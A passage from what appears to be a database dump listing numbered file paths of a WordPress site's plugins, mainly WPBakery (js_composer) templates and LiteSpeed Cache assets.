pages/vc-settings/index.php','wp-content/plugins/js_composer/include/templates/pages/vc-settings/index.php'),(1546,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/pages/vc-settings/tab-vc-roles.php','wp-content/plugins/js_composer/include/templates/pages/vc-settings/tab-vc-roles.php'),(1547,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/pages/vc-settings/tab.php','wp-content/plugins/js_composer/include/templates/pages/vc-settings/tab.php'),(1548,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/pages/vc-settings/vc-automapper.php','wp-content/plugins/js_composer/include/templates/pages/vc-settings/vc-automapper.php'),(1549,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/pages/vc-welcome/index.php','wp-content/plugins/js_composer/include/templates/pages/vc-welcome/index.php'),(1550,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/pages/vc-welcome/vc-faq.php','wp-content/plugins/js_composer/include/templates/pages/vc-welcome/vc-faq.php'),(1551,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/pages/vc-welcome/vc-resources.php','wp-content/plugins/js_composer/include/templates/pages/vc-welcome/vc-resources.php'),(1552,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/pages/vc-welcome/vc-welcome.php','wp-content/plugins/js_composer/include/templates/pages/vc-welcome/vc-welcome.php'),(1553,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/params/column_offset/template.tpl.php','wp-content/plugins/js_composer/include/templates/params/column_offset/template.tpl.php'),(1554,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/params/google_fonts/template.php','wp-content/plugins/js_composer/include/templates/params/google_fonts/template.php'),(1555,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/params/loop/templates.html','wp-content/plugins/js_composer/include/templates/params/loop/templates.html'),(1556,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/params/options/templates.html','wp-content/plugins/js_composer/include/templates/params/options/templates.html'),(1557,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/params/param_group/add.tpl.php','wp-content/plugins/js_composer/include/templates/params/param_group/add.tpl.php'),(1558,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/params/param_group/content.tpl.php','wp-content/plugins/js_composer/include/templates/params/param_group/content.tpl.php'),(1559,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/params/param_group/inner_content.tpl.php','wp-content/plugins/js_composer/include/templates/params/param_group/inner_content.tpl.php'),(1560,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/params/vc_grid_item/attributes/featured_image.php','wp-content/plugins/js_composer/include/templates/params/vc_grid_item/attributes/featured_image.php'),(1561,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/params/vc_grid_item/attributes/post_categories.php','wp-content/plugins/js_composer/include/templates/params/vc_grid_item/attributes/post_categories.php'),(1562,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/params/vc_grid_item/attributes/vc_btn.php','wp-content/plugins/js_composer/include/templates/params/vc_grid_item/attributes/vc_btn.php'),(1563,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/params/vc_grid_item/editor/partials/vc_grid_item_editor_footer.tpl.php','wp-content/plugins/js_composer/include/templates/params/vc_grid_item/editor/partials/vc_grid_item_editor_footer.tpl.php'),(1564,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/params/vc_grid_item/editor/vc_grid_item_editor.tpl.php','wp-content/plugins/js_composer/include/templates/params/vc_grid_item/editor/vc_grid_item_editor.tpl.php'),(1565,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/params/vc_grid_item/editor/vc_ui-template-preview.tpl.php','wp-content/plugins/js_composer/include/templates/params/vc_grid_item/editor/vc_ui-template-preview.tpl.php'),(1566,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/params/vc_grid_item/preview.tpl.php','wp-content/plugins/js_composer/include/templates/params/vc_grid_item/preview.tpl.php'),(1567,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/params/vc_grid_item/shortcodes/vc_btn.php','wp-content/plugins/js_composer/include/templates/params/vc_grid_item/shortcodes/vc_btn.php'),(1568,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/params/vc_grid_item/shortcodes/vc_button2.php','wp-content/plugins/js_composer/include/templates/params/vc_grid_item/shortcodes/vc_button2.php'),(1569,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/params/vc_grid_item/shortcodes/vc_custom_heading.php','wp-content/plugins/js_composer/include/templates/params/vc_grid_item/shortcodes/vc_custom_heading.php'),(1570,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/params/vc_grid_item/shortcodes/vc_icon.php','wp-content/plugins/js_composer/include/templates/params/vc_grid_item/shortcodes/vc_icon.php'),(1571,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/params/vc_grid_item/shortcodes/vc_single_image.php','wp-content/plugins/js_composer/include/templates/params/vc_grid_item/shortcodes/vc_single_image.php'),(1572,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/shortcodes/layerslider_vc.php','wp-content/plugins/js_composer/include/templates/shortcodes/layerslider_vc.php'),(1573,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/shortcodes/post_block/_item.php','wp-content/plugins/js_composer/include/templates/shortcodes/post_block/_item.php'),(1574,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/shortcodes/rev_slider_vc.php','wp-content/plugins/js_composer/include/templates/shortcodes/rev_slider_vc.php'),(1575,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/shortcodes/vc_accordion.php','wp-content/plugins/js_composer/include/templates/shortcodes/vc_accordion.php'),(1576,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/shortcodes/vc_accordion_tab.php','wp-content/plugins/js_composer/include/templates/shortcodes/vc_accordion_tab.php'),(1577,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/shortcodes/vc_basic_grid.php','wp-content/plugins/js_composer/include/templates/shortcodes/vc_basic_grid.php'),(1578,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/shortcodes/vc_basic_grid_filter.php','wp-content/plugins/js_composer/include/templates/shortcodes/vc_basic_grid_filter.php'),(1579,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/shortcodes/vc_btn.php','wp-content/plugins/js_composer/include/templates/shortcodes/vc_btn.php'),(1580,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/shortcodes/vc_button.php','wp-content/plugins/js_composer/include/templates/shortcodes/vc_button.php'),(1581,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/shortcodes/vc_button2.php','wp-content/plugins/js_composer/include/templates/shortcodes/vc_button2.php'),(1582,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/shortcodes/vc_column.php','wp-content/plugins/js_composer/include/templates/shortcodes/vc_column.php'),(1583,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/shortcodes/vc_column_inner.php','wp-content/plugins/js_composer/include/templates/shortcodes/vc_column_inner.php'),(1584,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/shortcodes/vc_column_text.php','wp-content/plugins/js_composer/include/templates/shortcodes/vc_column_text.php'),(1585,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/shortcodes/vc_cta.php','wp-content/plugins/js_composer/include/templates/shortcodes/vc_cta.php'),(1586,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/shortcodes/vc_cta_button.php','wp-content/plugins/js_composer/include/templates/shortcodes/vc_cta_button.php'),(1587,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/shortcodes/vc_cta_button2.php','wp-content/plugins/js_composer/include/templates/shortcodes/vc_cta_button2.php'),(1588,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/shortcodes/vc_custom_field.php','wp-content/plugins/js_composer/include/templates/shortcodes/vc_custom_field.php'),(1589,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/shortcodes/vc_custom_heading.php','wp-content/plugins/js_composer/include/templates/shortcodes/vc_custom_heading.php'),(1590,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/shortcodes/vc_empty_space.php','wp-content/plugins/js_composer/include/templates/shortcodes/vc_empty_space.php'),(1591,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/shortcodes/vc_facebook.php','wp-content/plugins/js_composer/include/templates/shortcodes/vc_facebook.php'),(1592,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/shortcodes/vc_flickr.php','wp-content/plugins/js_composer/include/templates/shortcodes/vc_flickr.php'),(1593,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/shortcodes/vc_gallery.php','wp-content/plugins/js_composer/include/templates/shortcodes/vc_gallery.php'),(1594,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/shortcodes/vc_gitem.php','wp-content/plugins/js_composer/include/templates/shortcodes/vc_gitem.php'),(1595,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/shortcodes/vc_gitem_animated_block.php','wp-content/plugins/js_composer/include/templates/shortcodes/vc_gitem_animated_block.php'),(1596,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/shortcodes/vc_gitem_block.php','wp-content/plugins/js_composer/include/templates/shortcodes/vc_gitem_block.php'),(1597,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/shortcodes/vc_gitem_col.php','wp-content/plugins/js_composer/include/templates/shortcodes/vc_gitem_col.php'),(1598,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/shortcodes/vc_gitem_image.php','wp-content/plugins/js_composer/include/templates/shortcodes/vc_gitem_image.php'),(1599,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/shortcodes/vc_gitem_post_author.php','wp-content/plugins/js_composer/include/templates/shortcodes/vc_gitem_post_author.php'),(1600,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/shortcodes/vc_gitem_post_categories.php','wp-content/plugins/js_composer/include/templates/shortcodes/vc_gitem_post_categories.php'),(1601,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/shortcodes/vc_gitem_post_data.php','wp-content/plugins/js_composer/include/templates/shortcodes/vc_gitem_post_data.php'),(1602,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/shortcodes/vc_gitem_post_meta.php','wp-content/plugins/js_composer/include/templates/shortcodes/vc_gitem_post_meta.php'),(1603,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/shortcodes/vc_gitem_row.php','wp-content/plugins/js_composer/include/templates/shortcodes/vc_gitem_row.php'),(1604,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/shortcodes/vc_gitem_zone.php','wp-content/plugins/js_composer/include/templates/shortcodes/vc_gitem_zone.php'),(1605,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/shortcodes/vc_gitem_zone_c.php','wp-content/plugins/js_composer/include/templates/shortcodes/vc_gitem_zone_c.php'),(1606,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/shortcodes/vc_gmaps.php','wp-content/plugins/js_composer/include/templates/shortcodes/vc_gmaps.php'),(1607,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/shortcodes/vc_googleplus.php','wp-content/plugins/js_composer/include/templates/shortcodes/vc_googleplus.php'),(1608,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/shortcodes/vc_gutenberg.php','wp-content/plugins/js_composer/include/templates/shortcodes/vc_gutenberg.php'),(1609,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/shortcodes/vc_hoverbox.php','wp-content/plugins/js_composer/include/templates/shortcodes/vc_hoverbox.php'),(1610,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/shortcodes/vc_icon.php','wp-content/plugins/js_composer/include/templates/shortcodes/vc_icon.php'),(1611,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/shortcodes/vc_images_carousel.php','wp-content/plugins/js_composer/include/templates/shortcodes/vc_images_carousel.php'),(1612,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/shortcodes/vc_item.php','wp-content/plugins/js_composer/include/templates/shortcodes/vc_item.php'),(1613,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/shortcodes/vc_items.php','wp-content/plugins/js_composer/include/templates/shortcodes/vc_items.php'),(1614,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/shortcodes/vc_line_chart.php','wp-content/plugins/js_composer/include/templates/shortcodes/vc_line_chart.php'),(1615,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/shortcodes/vc_message.php','wp-content/plugins/js_composer/include/templates/shortcodes/vc_message.php'),(1616,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/shortcodes/vc_pie.php','wp-content/plugins/js_composer/include/templates/shortcodes/vc_pie.php'),(1617,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/shortcodes/vc_pinterest.php','wp-content/plugins/js_composer/include/templates/shortcodes/vc_pinterest.php'),(1618,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/shortcodes/vc_posts_slider.php','wp-content/plugins/js_composer/include/templates/shortcodes/vc_posts_slider.php'),(1619,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/shortcodes/vc_progress_bar.php','wp-content/plugins/js_composer/include/templates/shortcodes/vc_progress_bar.php'),(1620,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/shortcodes/vc_raw_html.php','wp-content/plugins/js_composer/include/templates/shortcodes/vc_raw_html.php'),(1621,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/shortcodes/vc_round_chart.php','wp-content/plugins/js_composer/include/templates/shortcodes/vc_round_chart.php'),(1622,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/shortcodes/vc_row.php','wp-content/plugins/js_composer/include/templates/shortcodes/vc_row.php'),(1623,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/shortcodes/vc_row_inner.php','wp-content/plugins/js_composer/include/templates/shortcodes/vc_row_inner.php'),(1624,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/shortcodes/vc_section.php','wp-content/plugins/js_composer/include/templates/shortcodes/vc_section.php'),(1625,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/shortcodes/vc_separator.php','wp-content/plugins/js_composer/include/templates/shortcodes/vc_separator.php'),(1626,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/shortcodes/vc_single_image.php','wp-content/plugins/js_composer/include/templates/shortcodes/vc_single_image.php'),(1627,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/shortcodes/vc_tab.php','wp-content/plugins/js_composer/include/templates/shortcodes/vc_tab.php'),(1628,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/shortcodes/vc_tabs.php','wp-content/plugins/js_composer/include/templates/shortcodes/vc_tabs.php'),(1629,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/shortcodes/vc_text_separator.php','wp-content/plugins/js_composer/include/templates/shortcodes/vc_text_separator.php'),(1630,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/shortcodes/vc_toggle.php','wp-content/plugins/js_composer/include/templates/shortcodes/vc_toggle.php'),(1631,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/shortcodes/vc_tta_global.php','wp-content/plugins/js_composer/include/templates/shortcodes/vc_tta_global.php'),(1632,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/shortcodes/vc_tta_pageable_section.php','wp-content/plugins/js_composer/include/templates/shortcodes/vc_tta_pageable_section.php'),(1633,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/shortcodes/vc_tta_section.php','wp-content/plugins/js_composer/include/templates/shortcodes/vc_tta_section.php'),(1634,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/shortcodes/vc_tweetmeme.php','wp-content/plugins/js_composer/include/templates/shortcodes/vc_tweetmeme.php'),(1635,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/shortcodes/vc_video.php','wp-content/plugins/js_composer/include/templates/shortcodes/vc_video.php'),(1636,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/shortcodes/vc_widget_sidebar.php','wp-content/plugins/js_composer/include/templates/shortcodes/vc_widget_sidebar.php'),(1637,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/shortcodes/vc_wp_archives.php','wp-content/plugins/js_composer/include/templates/shortcodes/vc_wp_archives.php'),(1638,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/shortcodes/vc_wp_calendar.php','wp-content/plugins/js_composer/include/templates/shortcodes/vc_wp_calendar.php'),(1639,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/shortcodes/vc_wp_categories.php','wp-content/plugins/js_composer/include/templates/shortcodes/vc_wp_categories.php'),(1640,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/shortcodes/vc_wp_custommenu.php','wp-content/plugins/js_composer/include/templates/shortcodes/vc_wp_custommenu.php'),(1641,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/shortcodes/vc_wp_links.php','wp-content/plugins/js_composer/include/templates/shortcodes/vc_wp_links.php'),(1642,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/shortcodes/vc_wp_meta.php','wp-content/plugins/js_composer/include/templates/shortcodes/vc_wp_meta.php'),(1643,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/shortcodes/vc_wp_pages.php','wp-content/plugins/js_composer/include/templates/shortcodes/vc_wp_pages.php'),(1644,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/shortcodes/vc_wp_posts.php','wp-content/plugins/js_composer/include/templates/shortcodes/vc_wp_posts.php'),(1645,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/shortcodes/vc_wp_recentcomments.php','wp-content/plugins/js_composer/include/templates/shortcodes/vc_wp_recentcomments.php'),(1646,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/shortcodes/vc_wp_rss.php','wp-content/plugins/js_composer/include/templates/shortcodes/vc_wp_rss.php'),(1647,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/shortcodes/vc_wp_search.php','wp-content/plugins/js_composer/include/templates/shortcodes/vc_wp_search.php'),(1648,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/shortcodes/vc_wp_tagcloud.php','wp-content/plugins/js_composer/include/templates/shortcodes/vc_wp_tagcloud.php'),(1649,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/shortcodes/vc_wp_text.php','wp-content/plugins/js_composer/include/templates/shortcodes/vc_wp_text.php'),(1650,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/shortcodes/vc_zigzag.php','wp-content/plugins/js_composer/include/templates/shortcodes/vc_zigzag.php'),(1651,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/index.php','wp-content/plugins/js_composer/index.php'),(1652,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/js_composer.php','wp-content/plugins/js_composer/js_composer.php'),(1653,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/vc_classmap.json.php','wp-content/plugins/js_composer/vc_classmap.json.php'),(1654,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/LICENSE','wp-content/plugins/litespeed-cache/LICENSE'),(1655,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/assets/css/fonts/litespeedfont.eot','wp-content/plugins/litespeed-cache/assets/css/fonts/litespeedfont.eot'),(1656,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/assets/css/fonts/litespeedfont.svg','wp-content/plugins/litespeed-cache/assets/css/fonts/litespeedfont.svg'),(1657,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/assets/css/fonts/litespeedfont.ttf','wp-content/plugins/litespeed-cache/assets/css/fonts/litespeedfont.ttf'),(1658,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/assets/css/fonts/litespeedfont.woff','wp-content/plugins/litespeed-cache/assets/css/fonts/litespeedfont.woff'),(1659,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/assets/css/iziModal.min.css','wp-content/plugins/litespeed-cache/assets/css/iziModal.min.css'),(1660,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/assets/css/litespeed-legacy.css','wp-content/plugins/litespeed-cache/assets/css/litespeed-legacy.css'),(1661,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/assets/css/litespeed.css','wp-content/plugins/litespeed-cache/assets/css/litespeed.css'),(1662,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/assets/img/Litespeed.icon.svg','wp-content/plugins/litespeed-cache/assets/img/Litespeed.icon.svg'),(1663,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/assets/img/iconlscwp.svg','wp-content/plugins/litespeed-cache/assets/img/iconlscwp.svg'),(1664,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/assets/img/icons/all.svg','wp-content/plugins/litespeed-cache/assets/img/icons/all.svg'),(1665,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/assets/img/icons/all_transients.svg','wp-content/plugins/litespeed-cache/assets/img/icons/all_transients.svg'),(1666,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/assets/img/icons/auto_draft.svg','wp-content/plugins/litespeed-cache/assets/img/icons/auto_draft.svg'),(1667,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/assets/img/icons/cross_icon.svg','wp-content/plugins/litespeed-cache/assets/img/icons/cross_icon.svg'),(1668,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/assets/img/icons/db.svg','wp-content/plugins/litespeed-cache/assets/img/icons/db.svg'),(1669,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/assets/img/icons/empty-cache.svg','wp-content/plugins/litespeed-cache/assets/img/icons/empty-cache.svg'),(1670,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/assets/img/icons/expired_transient.svg','wp-content/plugins/litespeed-cache/assets/img/icons/expired_transient.svg'),(1671,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/assets/img/icons/img_optm.svg','wp-content/plugins/litespeed-cache/assets/img/icons/img_optm.svg'),(1672,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/assets/img/icons/img_optm_disabled.svg','wp-content/plugins/litespeed-cache/assets/img/icons/img_optm_disabled.svg'),(1673,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/assets/img/icons/img_webp.svg','wp-content/plugins/litespeed-cache/assets/img/icons/img_webp.svg'),(1674,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/assets/img/icons/img_webp_disabled.svg','wp-content/plugins/litespeed-cache/assets/img/icons/img_webp_disabled.svg'),(1675,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/assets/img/icons/optimize_tables.svg','wp-content/plugins/litespeed-cache/assets/img/icons/optimize_tables.svg'),(1676,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/assets/img/icons/purge-403.svg','wp-content/plugins/litespeed-cache/assets/img/icons/purge-403.svg'),(1677,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/assets/img/icons/purge-404.svg','wp-content/plugins/litespeed-cache/assets/img/icons/purge-404.svg'),(1678,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/assets/img/icons/purge-500.svg','wp-content/plugins/litespeed-cache/assets/img/icons/purge-500.svg'),(1679,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/assets/img/icons/purge-all.svg','wp-content/plugins/litespeed-cache/assets/img/icons/purge-all.svg'),(1680,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/assets/img/icons/purge-cssjs.svg','wp-content/plugins/litespeed-cache/assets/img/icons/purge-cssjs.svg'),(1681,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/assets/img/icons/purge-front.svg','wp-content/plugins/litespeed-cache/assets/img/icons/purge-front.svg'),(1682,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/assets/img/icons/purge-object.svg','wp-content/plugins/litespeed-cache/assets/img/icons/purge-object.svg'),(1683,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/assets/img/icons/purge-opcache.svg','wp-content/plugins/litespeed-cache/assets/img/icons/purge-opcache.svg'),(1684,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/assets/img/icons/purge-pages.svg','wp-content/plugins/litespeed-cache/assets/img/icons/purge-pages.svg'),(1685,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/assets/img/icons/revision.svg','wp-content/plugins/litespeed-cache/assets/img/icons/revision.svg'),(1686,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/assets/img/icons/spam_comment.svg','wp-content/plugins/litespeed-cache/assets/img/icons/spam_comment.svg'),(1687,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/assets/img/icons/success_icon.svg','wp-content/plugins/litespeed-cache/assets/img/icons/success_icon.svg'),(1688,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/assets/img/icons/trackback-pingback.svg','wp-content/plugins/litespeed-cache/assets/img/icons/trackback-pingback.svg'),(1689,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/assets/img/icons/trash_comment.svg','wp-content/plugins/litespeed-cache/assets/img/icons/trash_comment.svg'),(1690,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/assets/img/icons/trash_post.svg','wp-content/plugins/litespeed-cache/assets/img/icons/trash_post.svg'),(1691,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/assets/img/lscwp-logo_90x90.png','wp-content/plugins/litespeed-cache/assets/img/lscwp-logo_90x90.png'),(1692,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/assets/img/lscwp_blue_font-icon_22px.svg','wp-content/plugins/litespeed-cache/assets/img/lscwp_blue_font-icon_22px.svg'),(1693,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/assets/img/lscwp_font-icon_32px.svg','wp-content/plugins/litespeed-cache/assets/img/lscwp_font-icon_32px.svg'),(1694,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/assets/img/lscwp_gray-yellow_font-icon_22px.svg','wp-content/plugins/litespeed-cache/assets/img/lscwp_gray-yellow_font-icon_22px.svg'),(1695,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/assets/img/lscwp_gray_font-icon_22px.svg','wp-content/plugins/litespeed-cache/assets/img/lscwp_gray_font-icon_22px.svg'),(1696,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/assets/img/lscwp_grayscale_font-icon_22px.svg','wp-content/plugins/litespeed-cache/assets/img/lscwp_grayscale_font-icon_22px.svg'),(1697,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/assets/img/quic-cloud-icon-16x16.svg','wp-content/plugins/litespeed-cache/assets/img/quic-cloud-icon-16x16.svg'),(1698,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/assets/img/quic-cloud-logo-light_stack_300px.png','wp-content/plugins/litespeed-cache/assets/img/quic-cloud-logo-light_stack_300px.png'),(1699,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/assets/img/quic-cloud-logo.svg','wp-content/plugins/litespeed-cache/assets/img/quic-cloud-logo.svg'),(1700,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/assets/img/slack-logo.png','wp-content/plugins/litespeed-cache/assets/img/slack-logo.png'),(1701,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/assets/js/babel.min.js','wp-content/plugins/litespeed-cache/assets/js/babel.min.js'),(1702,'/home/tummmyov/tummyrevolution.com/